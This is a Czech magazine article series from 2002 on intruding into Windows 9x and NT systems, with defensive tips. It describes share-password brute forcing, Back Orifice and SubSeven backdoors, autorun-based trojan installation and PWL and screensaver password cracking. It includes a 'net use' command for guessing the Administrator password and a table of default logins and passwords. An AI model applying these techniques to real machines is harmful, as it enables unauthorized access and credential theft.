S oběma problémy v současnosti nejlépe pomůže utilitka nazvaná Legion (http://www.pyeung.com/download/utility/legion.zip), kterou mají na svědomí lidé okolo Rhino9 Security Team. Legion nejenom že umí scanovat celé domény třídy C (tedy IP adresy X.X.X.*), ale od verze 2.1 výše také obsahuje velmi dobrý nástroj pro brute force zjiš»ování používaných hesel a automaticky je přiřazuje jednotlivým sdíleným zdrojům v případě, že testované heslo je správné - stačí pouze Legiounu předhodit seznam nejčastěji používaných hesel (ve formě tzv. slovníku hesel) a ten je co nejrychleji, doslova hrubou silou (odtud termín brute force), testuje na vzdáleném počítači a zjiš»uje, jestli náhodou některé z nich není to pravé. Jen pro doplnění - zarputilí lamači hesel budou jistě znát komerční L0pht Password Cracker (jeho okleštěnou verzi si lze stáhnout z archívů L0pht na http://www.l0pht.com/ - tento původní web je sice přesměrován na konzultantskou společnost, kterou původní členové L0pht založili, ale původní archívy zde zůstaly zachovány.)

Škoda, kterou může hacker na takovém počítači způsobit, je přímo závislá na tom, jak důležité soubory a informace jsou sdíleny. Pokud uživatel vzdáleného stroje alespoň trochu dbá na pravidla bezpečnosti, pak bude nejspíš sdílet pouze k tomu určené adresáře (resp. celé disky), navíc s pravidly read only - tedy "pouze ke čtení". Nicméně jak už jsme mohli být mnohokrát svědky, uživatel je bytost líná, takže není výjimkou, že se na lokální síti setkáte s počítačem, který má sdílený kompletní disk C: včetně systémových souborů, adresářů obsahujících elektronickou poštu, soukromá data apod. Pak není pro hackera nic jednoduššího, než do adresáře %system%\Start Menu\Programs\Startup umístit jakýkoliv exe/com/bat soubor, který bude okamžitě po resetu (nebo vypnutí a zapnutí počítače) spuštěn. Je libo formátovat disk či instalovat utilitku pro ukládání seznamu stisknutých kláves?

Rada uživateli: Pokud se chcete vyvarovat problémů se sdílením souborů, nejlépe pochopitelně učiníte, pokud nic sdílet nebudete. Administrátoři větších lokálních sítí, kteří chtějí mít přehled o desítkách nebo stovkách počítačů, nad nimiž bdí, by měli využívat utilitku POLEDIT.EXE (Systém Policy Editor), která je jednak součástí Windows 9x Resource Kitu, naleznete ji také na většině CDROMů s instalacemi Win9x (v adresáři \tools\reskit\netadmin\) anebo na http://support.microsoft.com/support/kb/articles/Q135/3/15.asp

V případě, že je sdílení souborů bezpodmínečně nutné, zvolte vždy možnost "read only" (pokud ostatní uživatelé LAN nepotřebují vaše soubory editovat), ke každému sdílenému adresáři (resp. disku) přiřaďte složité heslo složené z osmi alfanumerických znaků - nebojte se pro vlastní bezpečnost občas do hesla vložit znak typu !@#$% apod.)

A ještě malý bezpečnostní tip: Pokud za název sdíleného adresáře vložíte znak "$" (například SDILENE$), pak se tento sdílený adresář neobjeví v seznamu uvnitř Network Neighbourhood a navíc ho většina scanovacích utilit vůbec nenajde.

2. Hackování Win9x Dial-Up Serveru

Dial-Up server je standardní součástí všech instalací Windows 98 a výše a je možné jej díky balíku Microsoft Plus! doinstalovat i na počítač vybavený prastarými Windows 95. Kterýkoliv počítač připojený do LAN se tak může stát zadními vrátky do celé sítě jen díky tomu, že si jeho uživatel nainstaluje modem a k němu příslušné Dial-Up Server komponenty (pokud již součástí systému nejsou). U takto nakonfigurovaného systému si můžete být prakticky jisti, že v něm najdete sdílené zdroje - vždy» právě Dial-Up server je dokonalým nástrojem pro vzdálenou správu jakéhokoliv Win9x stroje, ale na druhé straně i ideálním vstupním bodem pro hackera. Stačí jen zjistit příslušné heslo - existuje množství špatně nakonfigurovaných systémů, které dokonce heslo ani neobsahují.

3. Vzdáleně š»ourání v systémových registrech

Na rozdíl od Windows NT/2000/XP sice Windows 9x neobsahují standardně žádný nástroj pro vzdálený přístup k registrům, každopádně je možné přiinstalovat Microsoft Remote Registry Service (tuto utilitku naleznete na instalačním CDROM Windows v adresáři \admin\nettools\remotreg). Na uživateli takto vybaveného systému pak záleží, jestli zvolí heslo pro přístup k registrům - a hlavně - jestli dané heslo nepatří mezi notoricky používané (určitě se každý z vás již někdy setkal s oznámením správce IT "nastavil jsem vám všem heslo "heslo", tak si to potom změňte na něco jiného".

4. Backdoors, aneb Zadní vrátka do systému

Předpokládejme, že nesdílíte žádné zdroje, Dial-Up Server jste poctivě deaktivovali a zároveň jste se ujistili, že Remote Registry Service na vašem počítači není nainstalován. Můžete být před piráty klidní? Odpověď se samozřejmě sama nabízí - ovšem že ne. Pokud útočník zjistí, že na vašem počítači nejsou nainstalovány žadné nástroje pro vzdálenou správu, pak se je rozhodně pokusí nainstalovat sám.

Řeknete si: "Přeci nejsem úplný idiot, abych někomu dával přístup ke svému počítači, aby si tam instaloval něco, o čem já nevím!", jenže na světě existují tzv. trojské koně, prográmky, které se navenek tváří jako něco úplně jiného (neškodného), které mohou být nositeli prudce nebezpečných skrytých utilit, které otevřou zadní vrátka ve vašem systému komukoliv, kdo o něco podobného požádá. Stejně jako onen prapůvodní dřevěný kůň pomohl vstoupit vojákům do nedobytné Tróje a způsobit tak její pád, může naprosto nenápadně vyhlížející prográmek do vašeho počítače propašovat některou z utilitek označovaných jako backdoor ("zadní vrátka"), která útočníkovi otevře hlavní bránu do vašeho systému tak, že si se vzdáleným počítačem může dělat prakticky cokoliv, co se mu zlíbí. Na obranu proti trojským koňům existuje jediná rada, omílaná dokola ze všech stran a přitom neustále podceňovaná: Nikdy nespouštějte EXE (.PIF, .BAT) soubory obdržené e-mailem jako přílohy (popř. obdržené na jiném médiu), jejichž původ není stoprocentně prokazatelný - to platí i pro nejrůznější srandičky kolující jako přílohy mezi přáteli. To samé platí pro testování webových adres, které obdržíte. V obou případech existuje reálné nebezpečí, že bude váš systém napaden některým z backdoor systémů. Navíc je doporučeno používat antivirové programy, které podporují sledování internetové komunikace.

Back Orifice

Back Orifice je jedním z nejznámějších klient/server backdoor systémů, které byly kdy pro operační systémy Windows vytvořeny. První verze, běžící pouze na Windows 9x, byla veřejně představena v roce 1998 na setkání nazvaném Black Hat (http://www.blackhat.com/) a můžete si ji stáhnout z http://www.cultdeadcow.com/tools/. Black Orifice představuje prakticky kompletní nástroj pro vzdálenou správu počítačů vybavených Windows 9x (kromě pronikání do cizích systémů je opravdu Black Orifice možné využívat pro čistě osobní a praktické účely) - Black Orifice umí přidávat a odstraňovat zápisy v systémových registrech, rebootovat systém, odesílat a přijímat soubory, zobrazovat hesla obsažená v cache systému, spouštět systémové procesy a vytvářet sdílení souborů. Pro Black Orifice existuje i spousta dodatečně vytvořených plug-inů, které například umí vytvořit samostatné kanály na IRC serverech, kde se automaticky "ohlašují" systémy napadené Black Orifice a oznamují tak útočníkovi, že jsou připraveny pro nekalou činnost.

Back Orifice může být nakonfigurován tak, aby nainstaloval svoji server část do EXE souboru s jakýmkoliv jménem (defaultně je nastaveno [mezernik].EXE), po napadení systému vkládá nový zápis do systémových registrů v HKEY_LOCAL_MACHINE\Software\Microsoft\Windows

\CurrentVersion\RunServices tak, aby byl spuštěn po každém resetu/novém spuštění počítače. Pokud běží, obsazuje standardně UDP port číslo 31337 (ano, jedná se o transkripci slova "eleet" nebo-li "elite"). Klientskou část Back Orifice má na svém počítači nainstalovanou hacker a její pomocí může cílový počítač ovládat s prakticky stejnými možnostmi jako lokální uživatel.

Ještě dále šla o rok mladší verze Back Orifice 2000 (BO2K). Veškeré funkce první verze zůstaly zachovány a navíc přibyly dvě důležité vlastnosti - obě části BO2K (klient i server) běží také na Windows NT/2000 a navíc autoři přidali volně dostupný developer kit, s jehož pomocí můžete z BO2K udělat velmi těžce detekovatelný backdoor. U standardního nastavení BO2K "poslouchá" na TCP portu 54320 nebo UDP portu 54321 a kopíruje sám sebe do souboru UMGR32.EXE v systémovém adresáři (nejčastěji C:\Windows). Veškerá nastavení jsou prováděna prostřednictvím bo2kcfg.exe

SubSeven

SubSeven je černým koněm mezi všemi zmiňovanými backdoor systémy. Je bezkonkurenčně nejstabilnější, jednodušeji se používá a útočníkovi nabízí největší množství nástrojů. SubSeven (S7S) defaultně sleduje TCP port číslo 27374 a k tomuto portu se také v základním nastavení připojují klientské části backdooru. SubSeven nabízí následující zajímavé nástroje:

• port scan přímo z počítače oběti (na straně scanovaných strojů se tak objevuje IP stroje napadeného S7S)
• FTP server, jehož domácí adresář je C:
• vzdálený editor systémových registrů
• ukládá hesla používaná softwarem vzdáleného počítače (RAS, ICQ apod.)
• umí přesměrovávat výstupy aplikací a měnit porty, přes které komunikují
• napojí se na lokálně/vzdáleně nainstalované tiskárny a umí z nich tisknout
• restartuje vzdálený systém (čistě systémově nebo natvrdo za běhu)
• ukládá stisknuté klávesy na vzdáleném systému (dokonalé pro zjiš»ování přístupových hesel vzdáleného uživatele)
• vzdálený terminál
• umí "obsadit" myš, takže se vzdálenou myší můžete pohybovat včetně stisknutí tlačítek bez možnosti zásahu vzdáleného uživatele)
• umí otevřít internetový prohlížeč a aktivovat kteroukoliv URL adresu, kterou zvolíte

Serverová část se také umí připojit na IRC, vytvořit předem daný kanál a zobrazovat na něm informace o napadeném stroji (IP adresa, aktivní komunikační port a přístupové heslo).

Pokud vás blíže zajímá problematika backdoors a trojských koňů, určitě nezapomeňte navštívit jednu z vůbec nejlepších stránek věnovaných právě těmto elektronickým zbraním, kterou najdete na adrese http:///. (V době publikace tohoto textu byla nedostupná - pozn. redakce) Dovíte se, které známé backdoory a trojské koně jsou právě v kurzu, které porty standardně využívají i jak se proti nim bránit včetně odkazů na kvalitní detekční software.

 

Windows 9x a lokální průniky

Na jakýkoliv počítač vybavený Windows 9x nejvíce platí přímý fyzický přístup k počítači. Na rozdíl do Windows NT/2000, u Windows 9x neexistuje bezpečný způsob multiuživatelského přístupu ke stanici. Kdokoliv se tedy k počítači fyzicky dostane, má "rootovská" práva. Kdokoliv tak může přijít k vašemu počítači a jednoduše jej nastartovat. Váš počítač běží a máte jej "ochráněný" zaheslovaným spořičem obrazovky? Stačí přeci počítač jednoduše natvrdo restartovat a veškerá ochrana je v tahu. Starší Windows 95 dokonce umožňovaly použití notoricky známé posloupnosti kláves CTRL-ALT-DEL nebo dokonce ALT-TAB pro vypořádání se se spořičem obrazovky vybaveným heslem.

Standardní logovací obrazovka WINDOWS LOGIN nezaručuje jakoukoliv bezpečnost, pouze aktivuje uživatelský profil člověka, jehož login zná, popřípadě vytvoří nový profil pro login, který doposud nebyl použit. Všichni uživatelé fyzicky přistupující k počítači s Windows 9x tak mají stejná práva - ta nejvyšší.

Jedním z mála způsobů, jak alespoň trochu chránit svá data, je nastavit heslo pro BIOS počítače. Heslo je natvrdo uloženo na základní desce počítače a nemá s nainstalovaným systémem cokoliv společného - chrání vás přes primárními zásahy do hardware vaší stanice. Pirátovi s fyzickým přístupem ke stanici ovšem nic nebrání vymontovat z počítače harddisk a vložit jej do jiného, jehož BIOS chráněn heslem není. Hesla pro spořiče obrazovek vás, jak už bylo řečeno, před vniknutím do systému neuchrání, nicméně neumožní nenechavcům prohlížet aktuální aktivní data, se kterými právě pracujete (rozepsaný milostný e-mail sekretářce nebo plán firmy na příští rok zobrazený v Internet Exploreru z tajné URL). V každém případě pozor na to, že heslo spořiče obrazovky je vždy ukládáno do systémových registrů v HKEY\Users\.Default\Control Panel\ScreenSave_Data a způsob, jakým je heslo kódováno, byl prolomen. Díky utilitkám jako SSBypas (http://www.amecisco.com/ssbypass.htm) nebo 95sscrk můžete hesla spořičů obrazovek velmi jednoduše najít a dekódovat do původní podoby.

Velmi nebezpečný je tzv. "autorun" mechanismus u CDROM mechanik, který je po standardním nainstalování Windows vždy aktivován. Pokud se totiž na nově vloženém CDčku nachází soubor autorun.inf, Windows automatický spustí ten EXE soubor, který najdou uvnitř autorun.inf na řádku začínajícím "open=". Pokud hrajete hry instalované z CD, jistě jste se už setkali s tím, že po vložení CD do mechaniky se automaticky spustí instalační program. Autorun funguje i v případě, že je na počítači aktivní spořič obrazovky! Pokud si hacker vytvoří své CDčko, které bude v autorun.inf obsahovat například instalační soubory SubSeven nebo Back Orifice, může jej na váš stroj nainstalovat, aniž si toho všimnete. Proto opravdu doporučuji autorun dekativovat (v Ovládacích panelech ikona Systém, pak Device Manager, klikněte na ikonu CDROM a v jejím "Settings" panelu odklikněte Auto Insert Notification).

Posledním podstatným lokálním nebezpečím je možnost získat jednotlivá systémová hesla z tzv. PWL souboru, který je uložen v kořenovém adresáři systému, nejčastěji C:\Windows. Zkuste se schválně na svém počítači poohlédnout po souboru s příponou *.PWL.

Ten obsahuje:

• hesla pro přístup ke sdíleným zdrojům počítače
• hesla k jednotlivým aplikacím které cachují tzv. application programming interface (API), například Dial-Up
• hesla pro přístup do Windows NT počítačů, které nejsou součástí stejné domény
• hesla pro logování se do Windows NT strojů, která nejsou primárním heslem pro přístup do daného stroje
• hesla pro přístup do NetWare serverů

Windows 95 měly naprosto nedostačující ochranu hesel uložených v PWL souboru. Vývojáři Microsoftu si byli vědomi tohoto problému a od verze Windows 95 OSR2 implementovali do systému podstatně vylepšený systém kódování, který ovšem není úplně dokonalý a je možné jej prolomit. Jednou z dobrých utilitek, které umí zjiš»ovat hesla ukrytá v PWL souboru, je PWLTOOL, jejímiž autory jsou Vitas Ramanchauskas a Evžen Korolev. Nachází se na adrese http://www.webdon.com/.

 

 

Počítačovým pirátem snadno a rychle (7.)
(Průniky do Windows NT a jak se bránit)

Magellan
(21.2.2002)

Windows NT jsou prvním operačním systémem firmy Microsoft, který můžeme považovat za opravdu sí»ově orientovaný a dodnes je jedním z vůbec nejpoužívanějších operačních systémů pro správu lokálních (LAN) i velkých otevřených (WAN) sítí - je zpětně kompatibilní s Windows 9x (což na druhou stranu občas způsobuje bezpečnostní problémy), přehledný a jednoduše ovladatelný pro běžného uživatele, kterého příkazová řádka UNIXu přivádí k šílenství.
V roce 1997, nedlouho po uvedení Windows NT na trh, napsal "Hobbit", člen Avian Research Inc., podrobný článek o dvou nejdůležitějších vnitřních částech sí»ové architektury Windows NT - Common Internet File System (CIFS) a Server Message Block (SMB), čímž umožnil nalezení prvních bezpečnostních děr (exploitů) v jádru Windows NT. Kopii původního textu můžete nalézt na url: http://www.insecure.org/stf/cifs.txt

Microsoftu se v průběhu let úspěšně podařilo vyřešit drtivou většinu existujících exploitů a vydat postupně celou řádku opravných patchů, které vřele doporučuji stáhnout z http://www.microsoft.com/. Současný pohled většiny zarputilých "unixářů" na Windows NT jako na naprosto odporný a děravý systém se nezakládá tak úplně na pravdě - neblahá pověst Windows NT je spíš produktem nabubřelého chvástání Microsoftu (které počítačoví nadšenci bytostně nenávidí), než kvalit samotného systému. Něco podobného je možné tvrdit o starších jednouživatelských operačních systémech Windows 9x, které "děravé" opravdu jsou, ale jak jsme si řekli v minulé kapitole, Windows 9x zkrátka nejsou určeny k tomu, aby fungovaly jako sí»ové servery. Proto podobné argumenty neobstojí. Jako operační systém spravující e-mailového klienta, balík kancelářských programů a sem tam nějakou tu hru se Windows 9x ukázaly být zcela postačující, a k tomu byly také vždy určeny.

Nicméně správně nainstalované Windows NT včetně aplikovaných aktuálních patchů jsou sí»ovým operačním systémem, který se většině UNIXů ve stabilitě a bezpečnosti vyrovná. Dovolím si dokonce tvrdit, že obsahuje několik velmi zajímavých drobností, které jej v několika aspektech činí (v porovnání s UNIXem) ještě bezpečnějším:

• Windows NT například neobsahují vestavěnou schopnost vzdáleně spouštět programy tak, aby běžely na procesoru serveru (což UNIX umožňuje). Jakékoliv programy spuštěné z klientského počítače tak vždy běží na jeho procesoru (a neumožňují tak zneužívat zdroje serveru, popřípadě v nich přímo hledat bezpečnostní díry) a zároveň využívají jeho lokální paměti. Jedinou výjimkou z tohoto pravidla je NT Terminal Server Edition, který (podobně jako UNIX) nabízí možnost nainstalování vzdálených shellů (samostatných uživatelských účtů s čistě vzdáleným přístupem a přiřazenými systémovými zdroji serveru, kterému se také říká shell-box). NT Terminal Server Edition je součástí standardní instalace Windows 2000, které jsou technologickým pokračováním Windows NT - o nich si budeme povídat v následujících dílech seriálu.
• právo nalogování se do konzole je vyhrazeno jen několika málo administrátorským účtům, a to ihned po čistém nainstalování systému (navíc jen na verzi Windows NT Server Edition, nikoliv na uživatelských NT Workstation), takže dokud se hackerovi nepodaří prolomit některý z účtů s těmito oprávněními, pak stojí tzv. před "branami systému" a těžko se mu podaří přístup k jakýmkoliv datům.

Už jsem nakousnul problém s uživatelskou přívětivostí a zpětnou kompatibilitou Windows NT v porovnání s jednouživatelskými verzemi Windows (nejčastěji Windows 95/98). Jak pochopíte dále v tomto dílu o Windows NT, nutnost komunikace Windows NT s Windows 9x způsobuje vznik docela zbytečných bezpečnostních děr. Příkladem může být neustálé zaměření Windows NT na protokoly NetBIOS a CIFS/SMB a také existence prastarého (a dnes již dávno překonaného) LanManageru (LM) - což je algoritmus, který má za úkol zakódování uživatelských hesel. Jak logický vyplývá, pokud se logujete do počítače, vkládáte své uživatelské heslo, jehož původní originál musí být uložen někde na serveru. Server vámi vložené heslo zakóduje zmiňovaným LM algoritmem a porovná jej se zakódovanou verzí originálu. Pokud jsou obě zakódovaná hesla totožná, server vám povolí vstup do systému. Hackerům tento způsob zpracování hesel (říká se mu také "hash-ování" a na operačních systémech UNIX je řešeno obdobně) podstatně komplikuje možnost "odposlechu" uživatelem zadávaných hesel, protože díky tomu, že systém v drtivé většině případů zpracovává již zakódované heslo, jeho originál se v systému neobjeví téměř nikde kromě přímého zadávání z klávesnice uživatelem.

Další velkou potenciální bezpečnostní dírou Windows NT (za kterou Microsoft nemůže) je samotný lidský faktor. Jednoduchost instalace a nakonfigurování NT serveru svádí (hlavně u začínajících nebo problému-neznalých administrátorů) k laxnímu přístupu k zabezpečení jednotlivých stanic. Je to problém hlavně menších firem, jejichž infrastruktura je založena na operačních systémech Microsoft Windows a jejich správu mnohdy provádí ten počítačově nejgramotnější uživatel, který je právě ve firmě k dispozici. V podobných případech je proto téměř jisté, že při prvním pokusu o scanování NT systému naleznete "null account", o kterém jsme si povídali v díle věnovaném enumeraci.

Je tohle Windows NT stanice?

V případě, že se hackerovi z jakéhokoliv důvodu zalíbí stanice právě s tou vaší IP adresou (nebo se jménem stroje/domény - to pokud se jedná o nenechavce prohledávajícího vaši LAN zevnitř), jeho prvním krokem bude zběžné ohledání cílového stroje. Hacker musí zjistit, jaký počítač vlastně máte, co na něm běží za operační systém a které otevřené porty jsou k dispozici. Nejspíš začne klasickým port-scanem a pokud nalezne otevřené porty s čísly 135 a 139, pak bude s nejvyšší pravděpodobností vědět, že na vašem počítači je nainstalován právě operační systém Windows NT, protože právě porty s těmito dvěma čísly jsou u Windows NT standardně "otevřeny". Pokud nalezne pouze port číslo 139, může si být téměř jistý, že jde o operační systém Windows 9x. Vcelku snadno identifikovatelná jsou i Windows 2000, která na sebe upozorní otevřeným portem číslo 445.

Dobrou volbou pro správce serverů jsou nejrůznější utilitky, které fungují jako tzv. virtuální servery. Ty na vašem počítači naoko otevřou sí»ové porty, které vlastní systém nepoužívá, a docílíte toho, že méně zkušené piráty svedete z cesty tím, že svému počítači nasadíte jakési mimikry. Správce UNIXového stroje tak může virtuálně otevřít port číslo 139 a zamaskovat špatně chráněné stanice s Windows 9x. Zkušeného hackera sice takto lehce nezmatete, ale pirátům-začátečníkům tak do cesty postavíte překážku, na které si mohou vylámat zuby při testování Windows 9x exploitů. Ty při útoku na UNIXový server samozřejmě nebudou fungovat.

Poznámka na okraj:
V současnosti nejkritičtější část zabezpečení Windows NT jsou útoky vedené na webové stránky obsluhované Internet Information Serverem (IIS), který je zabudovanou součástí Windows NT a právě proti IIS existuje největší množství existujících exploitů, které umožňují útočníkovi získat přístup k datům na stroji s Windows NT. Útokům na webové stránky (tudíž i na IIS) se budeme věnovat v samostatné části seriálu.

Při útoku na Windows NT server musí mít hacker vždy na paměti zásadní věc - pokud nemá administrátorský přístup, není na Windows NT stroji nikdo. Jak už víte, na Windows NT není možné vzdáleně cokoliv spouštět, a pokud to již ve výjimkách možné je (jak jsme si řekli u NT Terminálu nebo v případě, že je na stanici nainstalována některá z utilitek pro vzdálený přístup), pak jedině s administrátorským heslem. A kruh se tak uzavírá. Pronikat do stroje, na kterém běží Windows NT, je tak doslova hon na administrátorské heslo.

Hacker si tedy na začátku zjistí, že na vzdáleném stroji jsou otevřené porty 135 a 139, takže bude s vysokou pravděpodobností předpokládat, že se jedná o stanici s nainstalovanými Windows NT. Bude pravděpodobně zkoušet starou dobrou metodu hádání správné kombinace loginu a hesla ke zdrojům, které nalezne minule zmiňovanými enumeračními technikami (null session prostřednictvím příkazu net use, utilitek DumpACL/DumpSec od Somarsfortu nebo sid2user/user2sid Evžena Rudného.

Pro hackera nejjednodušší cesta ke sdíleným zdrojům serveru je samozřejmě prostřednictvím lokální stanice, která je připojena přímo k serveru. Nejvíce pokusů o průnik k datům na serveru je prováděno právě z lokálních stanic. Pokud se nacházíte na lokální sítí firmy či školy, zkuste dvakrát kliknout na "Okolní počítače" ("Network Neighborhood" pokud máte anglickou verzi) a v nově otevřeném okně klikněte na počítač, který vás zajímá. Můžete samozřejmě použít i hledání prostřednictvím IP adresy cílového stroje (START - Hledat - Hledat Počítač). Obdržíte tak informace o sdílených zdrojích vzdáleného počítače a pokud znovu dvakrát kliknete na sdílený adresář, objeví se (pokud jsou pro přístup k němu jakkoliv omezena přístupová práva) okno požadující login a heslo.

Je také možné login a heslo pro přístup ke sdíleným adresářům zadávat přímo z příkazové řádky, opět prostřednictvím příkazu net use, což je pro hackera velmi nebezpečná zbraň, a to z toho důvodu, že umožňuje pokusy o zadávání hesel zautomatizovat a otestovat tak tisíce kombinací login/heslo během krátkého časového intervalu a navíc za využití minimální námahy:

C:\> net use file://192.168.10.10/IPC * /user:Administrator

kde 192.168.10.10 je IP adresa vzdáleného počítače, k němuž bychom rádi získali přístup, "*" znamená, že si přejeme heslo zadat až po vyžádání serverem a "user:Administrator" je login, k němuž si přejeme heslo zadat.

Vzhledem k tomu, že u Windows NT je možné definovat heslo pro přístup do celých domén, pak v případě že neuspějete při hledání administrátorského hesla pro konkrétní stroj a jeho sdílené adresáře (file://192.168.10.10/IPC), můžete se pokusit o to samé pro jednu z domén, které se na serveru nacházejí (například file://DOMENA/IPC). Dobrý administrátor by proto neměl zapomenout na to, aby nastavil jednotlivé účty tak, aby uživatel mohl provést pouze několik (nejčastěji 3) pokusů o zadání správného hesla, jinak je celý uživatelský účet uzamčen, dokud jej znovu neodemkne administrátor. Veškeré informace o správě hesel získáte prostřednictvím již několikrát zmiňovaného enumu.

Uživatelé jsou lidskými bytostmi a lidské bytosti jsou od přírody líné a pohodlné, což platí i pro volbu přístupových hesel k počítačům. Uživatelé (někdy i správci) proto velice často inklinují k tomu, aby se dopustili jedné ze tří nejčastějších chyb:

• uživetelé volí co nejjednodušší hesla. Vůbec nejjednodušší heslo je žádné heslo. Pokud má běžný uživatel tuto pravomoc (a příslušné znalosti), velice často se snaží každodenní zadávání hesla do počítače obejít, resp. vypnout.
• pokud už je uživatel nucen vložit do systému heslo, bude používat heslo co nejjednodušší, nejkratší a co nejsnáze zapamatovatelné. Seznam podnikových/školních hesel je pak přehlídkou dat narození, oblíbených značek aut či fotbalových klubů, jmen hudebních idolů nebo partnerů a partnerek - administrátoři by jistě mohli vyprávět o spoustě úsměvných případů.
• celá řada oblíbených uživatelských programů běžících pod Windows NT využívá stejného hesla jako to, jehož prostřednictvím se logujete do systému (znovu s ohledem na uživatelovu pohodlnost). Pokud zjistíte přístupové heslo do Windows NT stanice, existuje vysoká pravděpodobnost, že budete mít zároveň přístup k většině na ní nainstalovaných programů, nemluvě o sdílených službách serveru nebo ostatních lokálních stanic.

Hesla s vysokou pravděpoboností výskytu naleznete v následující tabulce. Podrobnější seznam světově nejpoužívanějších kombinací login/heslo najdete na http://www.securityparadigm.com/defaultpw.htm

login: heslo

administrator: "prázdné", heslo, password, administrator

arcserve: arcserver, backup

test: test, heslo, password

lab: lab, heslo, password

uživ.jméno: uživ.jméno, jméno firmy

backup: backup

tivoli: tivoli

backupexec: backup

 

 Jak se proti hádání hesel bránit?

Pokud jste administrátor Windows NT stroje, zkuste se řídit následujícími radami, abyste pokud možno zabránil (v každém případě ale podstatně ztížil) hackerům uhádnutí správné kombinace platného loginu a hesla. V nejhorším případě samozřejmě hesla administrátorského.

• pokud je stroj s Windows NT zároveň serverem připojeným k Internetu, pak na vašem firewallu/proxy zakažte přístup k TCP a UDP portům 135-139 a zároveň u všech sí»ových adapterů (např. sí»ová karta propojující počítač s Internetem) zakažte jakékoliv vazby k WINS klientovi prostřednictvím správce hardwarových zařízení.
• nastavte automatické uzamčení všech uživatelských účtů po co nejmenším počtu nesprávně zadaných hesel
• určete minimální nutný počet znaků, který musí mít každé heslo (doporučeno je alespoň 8), každé heslo by zároveň mělo obsahovat jak písmena, tak číslice
• aktivujte logování všech nesprávných pokusů o zadání hesla (správu hesel naleznete v Policies/Account/User manager)

Příště se budeme věnovat pokročilejším technikám získávání přístupu do Windows NT strojů, jako je "odposlouchávání" hesel na lokální síti, odkódování systémem skladovaných hesel nebo umělé zvyšování priority existujícího účtu.